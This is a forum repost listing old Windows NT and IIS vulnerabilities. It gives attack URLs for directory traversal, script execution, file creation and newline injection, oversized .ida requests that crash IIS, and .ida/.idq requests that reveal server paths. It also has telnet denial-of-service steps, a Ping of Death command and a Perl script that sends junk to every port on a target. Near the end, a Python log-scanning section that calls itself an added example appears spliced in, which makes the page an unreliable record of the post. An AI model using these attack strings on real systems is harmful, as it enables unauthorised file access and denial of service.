

汶上信息港

Title: NT vulnerabilities and their descriptions (English)

Author: 雜七雜八    Time: 2011-1-13 17:12
Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------

Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";    # old-style Perl chat library; chat2.pl must be on @INC

$systemname = shift @ARGV;   # target host name from the command line
die "usage: perl poke servername\n" unless $systemname;

$verbose = 1;    # tell me what you're hitting
$knownports = 1; # don't hit known problem ports

for ($port = 0; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;         # nothing listening on this port, move on
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/

Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida or: http://www.microsoft.com/anything.idq a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server.
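The URL-based items in the post (the ..\.. traversal and "GET ../..", the '>' redirection and %0A%0D tricks, and the .ida/.idq requests) all leave traces in web server logs. The following is an added example, not code from the original post, that flags such requests in log lines; the log format, client addresses, file paths and log lines are all constructed for the example.

```python
"""Flag web-log requests matching the IIS/NT URL patterns in the post.

Added example: the log lines below are constructed, and the format is a
simplified  <client> "<METHOD> <url> HTTP/x.y" <status>  line (assumed).
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
10.0.0.5 "GET /index.htm HTTP/1.0" 200
10.0.0.7 "GET /..%5c..%5cwinnt/win.ini HTTP/1.0" 200
10.0.0.7 "GET /scripts/exploit.bat>c:\\inetpub\\target.bat HTTP/1.0" 200
10.0.0.9 "GET /scripts/script_name%0A%0D>c:\\temp\\t.bat HTTP/1.0" 200
10.0.0.9 "GET /anything.idq HTTP/1.0" 404
10.0.0.11 "GET /{} HTTP/1.0" 500
""".format("." * 25000 + "ida")   # the 25 kB-of-dots .ida request

LINE_RE = re.compile(r'^(\S+) "(\w+) (\S+) HTTP/[\d.]+" (\d{3})$')


def classify(url):
    """Return the names of the post's patterns that a raw request URL matches."""
    path = unquote(url)                   # decode %5c, %0A, %0D before matching
    hits = set()
    if "../" in path or "..\\" in path:   # ..\.. traversal and "GET ../.."
        hits.add("traversal")
    if ">" in path:                       # shell redirection into a file
        hits.add("redirect")
    if "\n" in path or "\r" in path:      # %0A%0D newline injection
        hits.add("crlf")
    if path.lower().endswith((".ida", ".idq")):
        hits.add("ida-idq")               # path-disclosure / crash extension
        if len(path) > 1024:
            hits.add("long-ida")          # the oversized .ida request
    return hits


def scan(log_text):
    """Return [(client, [pattern, ...]), ...] for every flagged log line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not a request line, skip it
        client, _method, url, _status = m.groups()
        hits = classify(url)
        if hits:
            findings.append((client, sorted(hits)))
    return findings
```

Running `scan(SAMPLE_LOG)` flags five of the six constructed lines; the two network-level items in the post (port confusion and the Ping of Death) do not show up in web logs and need host or network monitoring instead.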

Welcome to 汶上信息港 (http://m.loveproblemguru.com/) Powered by Discuz! X3.5